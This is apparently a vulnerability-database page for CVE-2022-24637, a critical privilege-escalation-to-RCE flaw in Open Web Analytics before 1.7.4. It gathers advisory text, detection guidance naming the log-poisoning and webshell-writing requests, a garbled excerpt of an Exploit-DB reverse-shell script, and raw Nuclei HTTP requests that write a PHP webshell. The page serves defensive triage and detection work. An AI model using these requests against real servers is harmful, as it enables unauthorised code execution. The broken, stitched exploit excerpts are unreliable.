CVE-2022-24637
published 2022-03-18CVE-2022-24637: Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin…
PriorityP180critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
99.13%
99.9th percentile
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| open-web-analytics | open-web-analytics | >= 0 < 1.7.4 | 1.7.4 |
| openwebanalytics | open_web_analytics | < 1.7.4 | 1.7.4 |
Detection & IOCsextracted from sources · hover to see the quote
url/index.php?owa_do=base.optionsGeneral
commandowa_action=base.optionsUpdate&owa_config[base.error_log_file]=owa-data/caches/<randstr>.php&owa_config[base.error_log_level]=2
cookieowa_p=<hash>; owa_u=admin
- →Detect unauthenticated GET requests to OWA user cache PHP files at the pattern /owa-data/caches/<int>/owa_user/<md5hash>.php — these are iterated by the exploit to find user credential caches. ↗
- →Detect POST requests to /index.php?owa_do=base.optionsGeneral containing owa_config[base.error_log_file] pointing to a .php file inside owa-data/caches/ — this is the log-poisoning step that writes the webshell.
- →Detect POST requests to /index.php?owa_do=base.optionsGeneral containing owa_config[shell] in the body — this is the step that writes the reverse-shell payload into the log file.
- →Detect GET requests to /owa-data/caches/*.php — execution of a dynamically created PHP file in the cache directory indicates successful webshell deployment.
- →The exploit iterates cache keys 0–99 and derives filenames via MD5 of 'user_id<N>' to locate credential cache files; alert on rapid sequential GET requests matching /owa-data/caches/[0-9]+/owa_user/[a-f0-9]{32}\.php from a single source IP. ↗
- →The NVD description notes that cache files beginning with '<?php (single-quote prefix instead of proper PHP open tag) are not executed by PHP — detection of such files in owa-data/caches/ indicates exploitation of the cache-exposure vulnerability. ↗
- ·The shell filename is randomly generated (8 random chars + .php) per exploit run, so static filename-based detection will not work; pattern-based detection on the directory path is required. ↗
- ·The exploit hardcodes the log file path as /var/www/html/owa/owa-data/caches/<shell>.php; installations in non-default paths will use a different absolute path, but the relative web path owa-data/caches/ remains consistent. ↗
- ·The vulnerability affects OWA versions before 1.7.4; the exploit confirms the target by checking for 'version=1.7.3' in the main page response. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Improper Privilege Management in Open Web Analytics
osv·2022-03-19
CVE-2022-24637 [CRITICAL] Improper Privilege Management in Open Web Analytics
Improper Privilege Management in Open Web Analytics
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
GHSA
Improper Privilege Management in Open Web Analytics
ghsa·2022-03-19
CVE-2022-24637 [CRITICAL] CWE-269 Improper Privilege Management in Open Web Analytics
Improper Privilege Management in Open Web Analytics
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
No detection rules found.
Exploit-DB
Open Web Analytics 1.7.3 - Remote Code Execution
exploitdb·2022-11-11·CVSS 9.8
CVE-2022-24637 [CRITICAL] Open Web Analytics 1.7.3 - Remote Code Execution
Open Web Analytics 1.7.3 - Remote Code Execution
---
# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
# Date: 2022-08-30
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://www.openwebanalytics.com/
# Software Link: https://github.com/Open-Web-Analytics
# Version: $sock, 1=>$sock, 2=>$sock),$pipes);?>'
shell_filename = get_random_string(8) + '.php'
shell_url = base_url + 'owa-data/caches/' + shell_filename
if args.proxy:
proxy_url = get_normalized_url(args.proxy)
proxy_protocol = get_proxy_protocol(proxy_url)
proxies = { proxy_protocol: proxy_url }
else:
proxies = {}
session = requests.Session()
try:
mainpage_request = session.get(base_url, proxies=proxies)
except Exception as e:
print_message('Could not connect to "' + base_url, "ERROR")
exit()
else:
print
Nuclei
Open Web Analytics 1.7.3 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-24637 [CRITICAL] Open Web Analytics 1.7.3 - Remote Code Execution
Open Web Analytics 1.7.3 - Remote Code Execution
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with ''
matchers:
- type: word
part: body
words:
- '
- raw:
- |
POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
Host: {{Hostname}}
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Content-Type: application/x-www-form-urlencoded
owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2
- raw:
- |
POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
Host: {{Hostname}}
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Content-Type: appli
Metasploit
Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
metasploit
Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/169811/Open-Web-Analytics-1.7.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/171389/Open-Web-Analytics-1.7.3-Remote-Code-Execution.htmlhttps://devel0pment.de/?p=2494https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4http://packetstormsecurity.com/files/169811/Open-Web-Analytics-1.7.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/171389/Open-Web-Analytics-1.7.3-Remote-Code-Execution.htmlhttps://devel0pment.de/?p=2494https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4
2022-03-18
Published